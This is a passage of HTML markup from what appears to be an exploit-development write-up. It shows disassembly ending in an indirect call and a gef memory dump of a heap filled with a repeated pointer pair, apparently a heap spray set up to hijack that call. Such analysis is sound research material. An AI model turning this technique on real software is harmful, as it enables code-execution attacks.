class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x48<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f561304566284-3\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8485c3c407<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rdi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-i\">rax<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f561304566284-4\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8485c3c40a<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">call&nbsp;&nbsp; <\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0017 seconds] -->  <\/p>\n<p>Summarizing, the heap layout at the time of the vulnerable call will be like that:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f565861393961\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> gef\u27a4  x\/128gx $rax  0x7f83cfd4f2e0:\t0x00007f8485c3c403\t0x0000000000000035  0x7f83cfd4f2f0:\t0x00007f83cf0c2000\t0x00007f83cfd50d70  0x7f83cfd4f300:\t0x0000000000000000\t0x0000029b00000556  0x7f83cfd4f310:\t0x0000000000010101\t0x0000000000000305  0x7f83cfd4f320:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f330:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f340:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f350:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f360:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f370:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f380:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f390:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f3a0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f3b0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f3c0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f3d0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f3e0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f3f0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f400:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f410:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f420:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f430:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f440:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f450:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f460:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f470:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f480:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f490:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f4a0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f4b0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f4c0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f4d0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f4e0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f4f0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f500:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f510:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f520:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f530:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f540:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f550:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f560:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f570:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f580:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f590:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f5a0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f5b0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f5c0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f5d0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f5e0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f5f0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f600:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f610:\t0x00007f8485c3c403\t0x0000000000000025  0x7f83cfd4f620:\t0x00007f83cfd4f940\t0x00007f83cfd4e020  0x7f83cfd4f630:\t0x0000000007ffa000\t0x0000000000000305  0x7f83cfd4f640:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f650:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f660:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f670:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f680:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f690:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f6a0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f6b0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f6c0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f6d0:\t0x00007f8485c3c403\t0x00007f849fff1650<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f565861393961-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f565861393961-65\">65<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-1\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">128gx<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-i\">rax<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-2\"><span class=\"crayon-cn\">0x7f83cfd4f2e0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000035<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-3\"><span class=\"crayon-cn\">0x7f83cfd4f2f0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f83cf0c2000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f83cfd50d70<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-4\"><span class=\"crayon-cn\">0x7f83cfd4f300<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000029b00000556<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-5\"><span class=\"crayon-cn\">0x7f83cfd4f310<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000305<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-6\"><span class=\"crayon-cn\">0x7f83cfd4f320<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-7\"><span class=\"crayon-cn\">0x7f83cfd4f330<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-8\"><span class=\"crayon-cn\">0x7f83cfd4f340<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-9\"><span class=\"crayon-cn\">0x7f83cfd4f350<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-10\"><span class=\"crayon-cn\">0x7f83cfd4f360<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-11\"><span class=\"crayon-cn\">0x7f83cfd4f370<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-12\"><span class=\"crayon-cn\">0x7f83cfd4f380<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-13\"><span class=\"crayon-cn\">0x7f83cfd4f390<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-14\"><span class=\"crayon-cn\">0x7f83cfd4f3a0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-15\"><span class=\"crayon-cn\">0x7f83cfd4f3b0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-16\"><span class=\"crayon-cn\">0x7f83cfd4f3c0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-17\"><span class=\"crayon-cn\">0x7f83cfd4f3d0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-18\"><span class=\"crayon-cn\">0x7f83cfd4f3e0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-19\"><span class=\"crayon-cn\">0x7f83cfd4f3f0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-20\"><span class=\"crayon-cn\">0x7f83cfd4f400<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-21\"><span class=\"crayon-cn\">0x7f83cfd4f410<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-22\"><span class=\"crayon-cn\">0x7f83cfd4f420<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-23\"><span class=\"crayon-cn\">0x7f83cfd4f430<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-24\"><span class=\"crayon-cn\">0x7f83cfd4f440<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-25\"><span class=\"crayon-cn\">0x7f83cfd4f450<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-26\"><span class=\"crayon-cn\">0x7f83cfd4f460<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-27\"><span class=\"crayon-cn\">0x7f83cfd4f470<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-28\"><span class=\"crayon-cn\">0x7f83cfd4f480<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-29\"><span class=\"crayon-cn\">0x7f83cfd4f490<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-30\"><span class=\"crayon-cn\">0x7f83cfd4f4a0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-31\"><span class=\"crayon-cn\">0x7f83cfd4f4b0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-32\"><span class=\"crayon-cn\">0x7f83cfd4f4c0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-33\"><span class=\"crayon-cn\">0x7f83cfd4f4d0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-34\"><span class=\"crayon-cn\">0x7f83cfd4f4e0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-35\"><span class=\"crayon-cn\">0x7f83cfd4f4f0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f565861393961-36\"><span class=\"crayon-cn\">0x7f83cfd4f500<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f565861393961-37\"><span class=\"crayon-cn\">0x7f83cfd4f510<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f8485c3c403<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f849fff1650<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 